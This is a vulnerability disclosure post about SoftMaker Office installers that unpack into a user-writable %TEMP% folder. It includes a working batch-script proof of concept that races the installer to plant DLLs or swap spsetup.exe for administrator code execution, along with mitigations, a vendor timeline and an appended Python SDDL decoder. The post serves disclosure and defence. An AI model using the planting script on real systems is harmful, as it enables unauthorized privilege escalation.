Hi @ll,

the service pack installers for SoftMaker Office 201x, available from , are (surprise.-) vulnerable.

The executable installer (OUCH) ofw16_763.exe, a 7z SFX (OUCH), creates an UNPROTECTED directory "%TEMP%\7zSxxxxxxxx\" to extract its payload, then executes "%TEMP%\7zSxxxxxxxx\spsetup.exe".

"%TEMP%\7zSxxxxxxxx\" inherits the NTFS access rights of its parent "%TEMP%\", i.e. it allows full access for the UNPRIVILEGED user. For this well-known vulnerability see and

Due to the embedded application manifest, which specifies "requireAdministrator", the executable installer can only be run with administrative rights.

JFTR: if written properly, it would create a PROTECTED directory "%TEMP%\7zSxxxxxxxx\", writable only for privileged users!

The UNPRIVILEGED user, as well as any program running with the user's credentials, can modify the extracted files, for example "%TEMP%\7zSxxxxxxxx\spsetup.exe", which is executed with administrative rights, resulting in arbitrary code execution with elevation of privilege.

Additionally "spsetup.exe" is vulnerable to DLL hijacking, another well-known vulnerability. See , , , and plus

Thanks to the unprotected directory "%TEMP%\7zSxxxxxxxx\" the unprivileged user can write DLLs to "%TEMP%\7zSxxxxxxxx\" which are loaded by "spsetup.exe", again resulting in arbitrary code execution with elevation of privilege!

Proof-of-concept:
~~~~~~~~~~~~~~~~~

0. download and save it in an arbitrary directory;

1. download (see alias ) and save it in an(other) arbitrary directory;

2. save the following batch script in the same directory as SENTINEL.DLL:

--- OFW16_873.CMD ---
:WAIT
@If Not Exist "%TEMP%\7z*" Goto :WAIT
For /D %%! In ("%TEMP%\7z*") Do Set foobar=%%!
Copy "SENTINEL.DLL" "%foobar%\NTMARTA.DLL"
Copy "SENTINEL.DLL" "%foobar%\VERSION.DLL"
Copy "SENTINEL.DLL" "%foobar%\WINSPOOL.DRV"
--- EOF ---

3. start the batch script;

4. execute ofw16_873.exe and notice the message boxes displayed by SENTINEL.DLL.

PWNED!

5. download to the same directory as the batch script;

6. in the batch script replace the 3 lines Copy ... with
Copy "SENTINEL.EXE" "%foobar%\spsetup.exe"

7. start the batch script;

8. execute ofw16_873.exe and notice the message box displayed by SENTINEL.EXE.

PWNED!

Mitigations:
~~~~~~~~~~~~

* Don't use executable installers! NEVER! Don't use self-extractors! NEVER! See and plus alias for more information.

* Practice STRICT privilege separation: NEVER use the so-called "protected" administrator account(s) created during Windows setup, which use the same "%TEMP%" for unprivileged and privileged processes!

* Add an ACE "(D;OIIO;WP;;;WD)" to the ACL of every "%USERPROFILE%"; use to decode it to "deny execution of files in this directory for everyone, inheritable to all files in all subdirectories".

stay tuned
Stefan Kanthak

Timeline:
~~~~~~~~~

2016-12-15 sent vulnerability report to vendor
           no reply, not even an acknowledgement of receipt

2016-12-23 resent vulnerability report to vendor, cc CERT at German BSI
           no reply, not even an acknowledgement of receipt

2016-12-27 CERT at German BSI contacts vendor offering help
           no reply, not even an acknowledgement of receipt

2016-12-31 report published
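The mitigation ACE above is written in SDDL, which is compact but easy to misread: "WD" means WRITE_DAC in the rights field but Everyone in the trustee field, and "OI" without "CI" still reaches files in subdirectories because subdirectories receive the ACE as inherit-only. As an added example that is not part of Stefan Kanthak's post, here is a small Python decoder for such ACE strings; its lookup tables are constructed and cover only the tokens common in file-system ACLs, so unknown tokens are reported rather than guessed.

```python
import re
from functools import reduce

# Constructed lookup tables: only the SDDL tokens common in file-system ACLs.
ACE_TYPES = {"A": "Allow", "D": "Deny", "AU": "Audit", "AL": "Alarm"}
ACE_FLAGS = {"OI": "object inherit (files in the directory inherit it)",
             "CI": "container inherit (subdirectories inherit it)",
             "IO": "inherit only (not applied to the directory itself)",
             "NP": "no propagate inherit", "ID": "inherited"}
# rights token -> (access-mask bits, meaning on files and directories)
RIGHTS = {"GA": (0x10000000, "generic all"), "GR": (0x80000000, "generic read"),
          "GW": (0x40000000, "generic write"), "GX": (0x20000000, "generic execute"),
          "FA": (0x1F01FF, "file all access"), "FR": (0x120089, "file read"),
          "FW": (0x120116, "file write"), "FX": (0x1200A0, "file execute"),
          "RC": (0x20000, "read control"), "SD": (0x10000, "delete"),
          "WD": (0x40000, "write DAC"), "WO": (0x80000, "write owner"),
          "CC": (0x1, "FILE_READ_DATA / list directory"),
          "DC": (0x2, "FILE_WRITE_DATA / add file"),
          "LC": (0x4, "FILE_APPEND_DATA / add subdirectory"),
          "WP": (0x20, "FILE_EXECUTE / traverse directory")}
# trustee abbreviations; "WD" here means Everyone, not WRITE_DAC as above
SIDS = {"WD": "Everyone (S-1-1-0)", "BA": "Administrators (S-1-5-32-544)",
        "BU": "Users (S-1-5-32-545)", "SY": "SYSTEM (S-1-5-18)",
        "AU": "Authenticated Users (S-1-5-11)", "CO": "Creator Owner (S-1-3-0)"}

def _pairs(field):  # split a run of two-letter tokens: "OIIO" -> ["OI", "IO"]
    if len(field) % 2:
        raise ValueError(f"odd-length token field: {field!r}")
    return [field[i:i + 2] for i in range(0, len(field), 2)]

def decode_ace(ace):
    """Decode one ACE "(type;flags;rights;objguid;inhguid;sid)" into a dict."""
    m = re.fullmatch(r"\(([^()]*)\)", ace.strip())
    if not m or m.group(1).count(";") != 5:
        raise ValueError(f"malformed ACE: {ace!r}")
    ace_type, flags, rights, _obj, _inh, sid = m.group(1).split(";")
    if rights.lower().startswith("0x"):  # raw hex access mask instead of tokens
        parts = [(int(rights, 16), f"mask {rights}")]
    else:
        parts = [RIGHTS.get(t, (0, f"unknown right {t}")) for t in _pairs(rights)]
    return {"type": ACE_TYPES.get(ace_type, f"unknown type {ace_type}"),
            "flags": [ACE_FLAGS.get(f, f"unknown flag {f}") for f in _pairs(flags)],
            "rights": [p[1] for p in parts],
            "mask": reduce(lambda acc, p: acc | p[0], parts, 0),
            "trustee": SIDS.get(sid, sid)}  # literal SID strings pass through

def describe(ace):  # one-line English rendering of a decoded ACE
    d = decode_ace(ace)
    return (f"{d['type']} {', '.join(d['rights'])} for {d['trustee']}"
            f" [{'; '.join(d['flags']) or 'no inheritance flags'}]")
```

Running describe("(D;OIIO;WP;;;WD)") yields the same reading the post gives: a deny of FILE_EXECUTE for Everyone, inherited by files only and not applied to the directory itself.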